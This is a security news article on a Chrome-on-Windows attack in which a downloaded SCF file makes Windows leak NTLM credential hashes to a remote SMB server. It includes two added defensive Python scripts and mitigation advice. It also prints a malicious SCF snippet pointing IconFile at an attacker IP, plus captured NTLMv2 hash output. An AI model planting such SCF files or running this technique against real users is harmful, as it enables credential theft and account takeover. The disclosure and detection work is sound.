A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google's Chrome running on any version of Microsoft's Windows operating system, including Windows 10, that could allow remote hackers to steal users' login credentials.
Researcher Bosko Stankovic of DefenseCode has found that just by visiting a website containing a malicious SCF file, victims could unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.
This technique is not new and was exploited by Stuxnet — a powerful malware specifically designed to destroy Iran's nuclear programme — which used Windows shortcut LNK files to compromise systems.
What makes this attack different from others is the fact that such SMB authentication related attacks have been demonstrated publicly on Google Chrome for the first time, after Internet Explorer (IE) and Edge.
Chrome + SCF + SMB = Stealing Windows Credentials
The SCF (Shell Command File) shortcut file format works similarly to LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to keep and reuse the victim's authentication credentials," Stankovic wrote in a blog post, describing the flaw.
Basically, shortcut links on your desktop are text files with a specific syntax of shell code that defines the location of the icon/thumbnail, the application's name and its location.
[Shell]
Command=2
IconFile=explorer.exe,3
Since Chrome trusts Windows SCF files, attackers can trick victims into visiting a website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target system without prompting the user for confirmation.
As soon as the user opens the folder containing that downloaded file, immediately or later, the file automatically runs to retrieve an icon without the user having to click on it.
But instead of setting the location of an icon image, the malicious SCF file created by the attacker contains the location of a remote SMB server (controlled by the attacker).
[Shell]
IconFile=\\170.170.170.170\icon
So, as soon as the SCF file attempts to retrieve the icon image, Windows is tricked into authenticating automatically to the attacker-controlled remote server over the SMB protocol, handing over the victim's username and a hashed version of the password, which allows the attacker to use those credentials to authenticate to the victim's computer or network resources.
"Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares," Stankovic said.
But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources, so they'd no longer be vulnerable to such attacks, which make them load malicious code from outside servers.
However, SCF files were left alone.
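To show what a defender can check for on an endpoint, here is an added Python example (my code, not code from the article or from DefenseCode). It parses the [Shell] section of every SCF file in a folder and flags an IconFile entry that points at a UNC path, i.e. an icon that Windows would fetch over SMB, and also names like picture.jpg.scf, whose real extension Explorer hides. The sample SCF contents, the 203.0.113.10 host and the temporary folder are constructed for the demonstration and are not from the article.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Constructed sample SCF contents (hypothetical; not taken from the article).
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
REMOTE_ICON_SCF = "[Shell]\r\nIconFile=\\\\203.0.113.10\\icon\r\n"

# A UNC path starts with two backslashes, a host name, then another backslash.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_scf(text: str) -> Dict[str, str]:
    """Parse the INI-like [Shell] section of an SCF file into lower-cased keys."""
    values: Dict[str, str] = {}
    in_shell = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_shell = line.lower() == "[shell]"
            continue
        if in_shell and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def icon_target(values: Dict[str, str]) -> str:
    """Return the IconFile path without the optional ',<icon index>' suffix."""
    return values.get("iconfile", "").rsplit(",", 1)[0]


def is_remote_icon(path: str) -> bool:
    """True when the icon would be fetched from a UNC path, i.e. over SMB."""
    return UNC_RE.match(path) is not None


def unc_host(path: str) -> str:
    """Extract the host part of a UNC path such as \\\\host\\share."""
    return path[2:].split("\\", 1)[0]


def hides_extension(filename: str) -> bool:
    """True for names like picture.jpg.scf, which Explorer shows as picture.jpg."""
    parts = filename.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "scf"


def assess_scf(filename: str, text: str) -> List[str]:
    """Return findings for one SCF file; an empty list means nothing suspicious."""
    findings: List[str] = []
    target = icon_target(parse_scf(text))
    if is_remote_icon(target):
        findings.append(f"IconFile points to remote SMB host {unc_host(target)}")
    if hides_extension(filename):
        findings.append("double extension hides .scf in Explorer")
    return findings


def scan_directory(folder: Path) -> Dict[str, List[str]]:
    """Assess every *.scf file directly inside `folder`, keyed by file name."""
    report: Dict[str, List[str]] = {}
    for path in sorted(folder.iterdir()):
        if path.is_file() and path.suffix.lower() == ".scf":
            findings = assess_scf(path.name, path.read_text(errors="replace"))
            if findings:
                report[path.name] = findings
    return report


def demo() -> Dict[str, List[str]]:
    """Write the constructed samples into a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "desktop.scf").write_text(BENIGN_SCF)
        (folder / "picture.jpg.scf").write_text(REMOTE_ICON_SCF)
        return scan_directory(folder)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", "; ".join(findings))
```

Pointing scan_directory at a user's Downloads folder gives a quick triage of freshly downloaded SCF files; a benign desktop shortcut such as the explorer.exe sample yields no findings, while a UNC IconFile is reported together with the host Windows would have authenticated to.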
Exploiting LM/NTLM Hash Authentication via SCF File
Image Source: SANS
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in four steps:
- The Windows user (client) attempts to log into a server.
- The server responds with a challenge value, asking the user to encrypt the challenge value with his hashed password and send it back.
- Windows handles the SCF request by sending the client's username and hashed version of the password to the server.
- The server then captures that response and approves authentication if the client's hashed password is correct.
If the user is part of a corporate network, the network credentials assigned to the user by his company's sysadmin will be sent to the attacker.
If the victim is a home user, the victim's Windows username and password will be sent to the attacker.
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
No doubt, the credentials are encrypted, but they can be "brute-forced" later to retrieve the original login password in plain text.
"It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings," the researcher said. "Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files."
No Need to Decrypt Password *Sometimes*
Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to log in to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making decryption unnecessary.
Such vulnerabilities, according to the researcher, could also pose a serious threat to large organisations, as they enable attackers to impersonate one of their members, allowing attackers to immediately reuse the gained privileges to further escalate access, gain access to and control of their IT resources, and perform attacks on other members.
How to Prevent Such SMB Authentication-related Attacks
Simply, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers cannot query remote SMB servers.
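As an added example of the network-side control just described (my code, not the article's), the Python below scans constructed outbound-connection log lines and reports TCP connections to port 139 or 445 whose destination lies outside the RFC 1918, loopback and link-local ranges. The log format, the 10.0.0.5 client and the 203.0.113.10 destination are assumptions made for the demonstration.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Ports used by SMB: 139 (NetBIOS session service) and 445 (direct SMB over TCP).
SMB_PORTS = {139, 445}

# What counts as "local" for this check: RFC 1918 ranges, loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample of an outbound-connection log (hypothetical format and addresses).
SAMPLE_LOG = """\
2017-05-15T13:10:40 TCP 10.0.0.5:49201 -> 10.0.0.20:445
2017-05-15T13:10:44 TCP 10.0.0.5:62521 -> 203.0.113.10:445
2017-05-15T13:10:45 TCP 10.0.0.5:62522 -> 203.0.113.10:139
2017-05-15T13:10:50 TCP 10.0.0.5:62530 -> 203.0.113.10:443
2017-05-15T13:11:02 UDP 10.0.0.5:137 -> 10.0.0.255:137
this line does not parse and is skipped
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)$")


def is_internal(address: str) -> bool:
    """True when the address falls inside one of the internal ranges above."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Turn one log line into a record, or None when it does not match the format."""
    match = LOG_RE.match(line.strip())
    if match is None:
        return None
    rec: Dict[str, object] = match.groupdict()
    rec["sport"] = int(match.group("sport"))
    rec["dport"] = int(match.group("dport"))
    return rec


def flag_outbound_smb(log_text: str) -> List[Dict[str, object]]:
    """Return records of TCP connections to SMB ports on non-internal destinations."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["proto"] == "TCP" and rec["dport"] in SMB_PORTS
                and not is_internal(str(rec["dst"]))):
            findings.append(rec)
    return findings


def hosts_by_source(findings: List[Dict[str, object]]) -> Dict[str, Set[str]]:
    """Group the flagged external SMB destinations by the internal client that reached them."""
    grouped: Dict[str, Set[str]] = defaultdict(set)
    for rec in findings:
        grouped[str(rec["src"])].add(str(rec["dst"]))
    return dict(grouped)


if __name__ == "__main__":
    hits = flag_outbound_smb(SAMPLE_LOG)
    for rec in hits:
        print(f"{rec['ts']} {rec['src']} -> {rec['dst']}:{rec['dport']} outbound SMB to WAN")
    print(hosts_by_source(hits))
```

The connection to 10.0.0.20:445 is a normal file-share access inside the LAN and is not reported; the two connections to 203.0.113.10 are exactly the traffic the firewall rule above would block, so the same check doubles as a test that the rule is actually in place.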
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then checking the "Ask where to save each file before downloading" option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to users.